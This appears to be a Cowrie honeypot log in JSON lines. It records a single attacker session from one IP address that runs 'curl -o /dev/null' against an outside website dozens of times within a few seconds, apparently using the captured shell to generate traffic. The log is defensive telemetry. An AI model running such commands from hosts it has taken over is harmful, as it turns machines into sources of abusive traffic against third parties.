{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:58.174329Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:58.211916Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:58.212888Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:58.258982Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:58.259965Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:58.302717Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:58.303586Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:58.341454Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:58.342343Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:58.379734Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:58.380688Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:58.420553Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:58.421440Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:58.460037Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:58.461027Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:58.497448Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:58.498407Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:58.535082Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:58.535948Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:58.573463Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:58.574378Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:58.613174Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:58.614013Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:58.650997Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:58.651904Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:58.698980Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:58.699897Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:58.739762Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:58.741016Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:58.779288Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:58.780276Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:58.820053Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:58.821352Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:58.858333Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:58.859376Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:58.905740Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:58.907121Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:58.961814Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:58.962772Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:59.054018Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:59.055026Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:59.192443Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:59.193440Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:59.231888Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:59.232851Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:59.270562Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:59.271546Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:59.308359Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:59.309199Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:59.349018Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:59.349892Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:59.389971Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:59.390841Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:59.454231Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:59.455219Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:59.495284Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:59.496110Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:59.532792Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:59.533751Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:59.571253Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:59.572182Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:59.609407Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:59.610390Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:59.646932Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:59.647809Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:59.684251Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:59.685136Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:59.794539Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:59.795571Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:59.832233Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:59.833061Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:59.871660Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:59.873510Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:59.920066Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:59.920948Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:59.965405Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:59.966260Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:00.007988Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:00.009731Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:00.060613Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:00.061523Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:00.099567Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:00.100487Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:00.139781Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:00.141019Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:00.181523Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:00.182388Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:00.218703Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:00.219549Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:00.256084Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:00.257362Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:00.297632Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:00.298533Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:00.342458Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:00.343344Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:00.379976Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:00.381390Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:00.419684Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:00.420543Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:00.457812Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:00.458747Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:00.496826Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:00.497952Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:00.535630Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:00.536554Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:00.581942Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:00.582855Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:00.619995Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:00.621137Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:00.658411Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:00.659311Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:00.697926Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:00.698813Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:00.735384Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:00.736537Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:00.773109Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:00.774008Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:00.811296Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:00.812247Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:00.849241Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:00.850376Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:00.965077Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:00.965998Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:01.002618Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:01.003788Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:01.040970Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:01.042346Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:01.079528Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:01.080443Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
